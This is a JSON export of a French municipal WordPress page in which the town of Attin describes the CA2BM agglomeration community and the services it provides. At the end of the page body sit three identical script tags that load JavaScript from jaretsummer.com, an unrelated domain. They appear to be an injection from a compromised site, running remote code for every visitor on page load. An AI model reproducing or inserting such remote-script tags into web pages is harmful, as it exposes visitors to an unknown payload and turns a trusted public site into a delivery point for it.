{"id":2660,"date":"2020-06-19T10:09:21","date_gmt":"2020-06-19T09:09:21","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=2660"},"modified":"2021-04-23T11:33:10","modified_gmt":"2021-04-23T10:33:10","slug":"ca2bm","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=2660","title":{"rendered":"CA2BM"},"content":{"rendered":"<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/06\/logo.png\"><img decoding=\"async\" class=\"alignleft size-thumbnail wp-image-2669\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/06\/logo-150x96.png\" alt=\"\" width=\"150\" height=\"96\"><\/a>La Communaut\u00e9 d\u2019Agglom\u00e9ration des 2 Baies en Montreuillois , CA2BM, dont d\u00e9pend la commune d\u2019Attin, a repris dans le cadre de la loi NOTRE de nombreuses comp\u00e9tences d\u00e9volues nagu\u00e8re aux communes.<\/p>\n<p>Ces comp\u00e9tences sont donc d\u00e9velopp\u00e9es et financ\u00e9es par la CA2BM \u00e0 destination de toutes les communes qui en sont membres, et les citoyens de toute l\u2019agglom\u00e9ration peuvent ainsi b\u00e9n\u00e9ficier des services ou des aides qui sont mis en place au sein de cette instance.<\/p>\n<p>La CA2BM a la comp\u00e9tence pour de nombreux domaines comme la Culture, le D\u00e9veloppement \u00e9conomique, le sport, le num\u00e9rique, l\u2019environnement, le transport\u2026 Elle est aussi partenaire privil\u00e9gi\u00e9e d\u2019autres collectivit\u00e9s territoriales comme la R\u00e9gion, le D\u00e9partement.<\/p>\n<p>En visitant r\u00e9guli\u00e8rement le site d\u00e9di\u00e9 de la CA2BM, vous resterez inform\u00e9 des \u00e9v\u00e8nements sportifs et culturels, des dispositifs d\u2019aides aux entreprises et particuliers,&nbsp; des r\u00e9alisations diverses qui peuvent concerner votre commune\u2026<\/p>\n<p><a href=\"https:\/\/www.ca2bm.fr\/\">https:\/\/www.ca2bm.fr\/<\/a><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La Communaut\u00e9 d\u2019Agglom\u00e9ration des 2 Baies en Montreuillois , CA2BM, dont d\u00e9pend la commune d\u2019Attin, a repris dans le cadre de la loi NOTRE de nombreuses comp\u00e9tences d\u00e9volues nagu\u00e8re aux communes. Ces comp\u00e9tences sont donc d\u00e9velopp\u00e9es et financ\u00e9es par la CA2BM \u00e0 destination de toutes les communes qui en sont membres, et les citoyens de [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-2660","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2660"}],"version-history":[{"count":7,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2660\/revisions"}],"predecessor-version":[{"id":2839,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/2660\/revisions\/2839"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}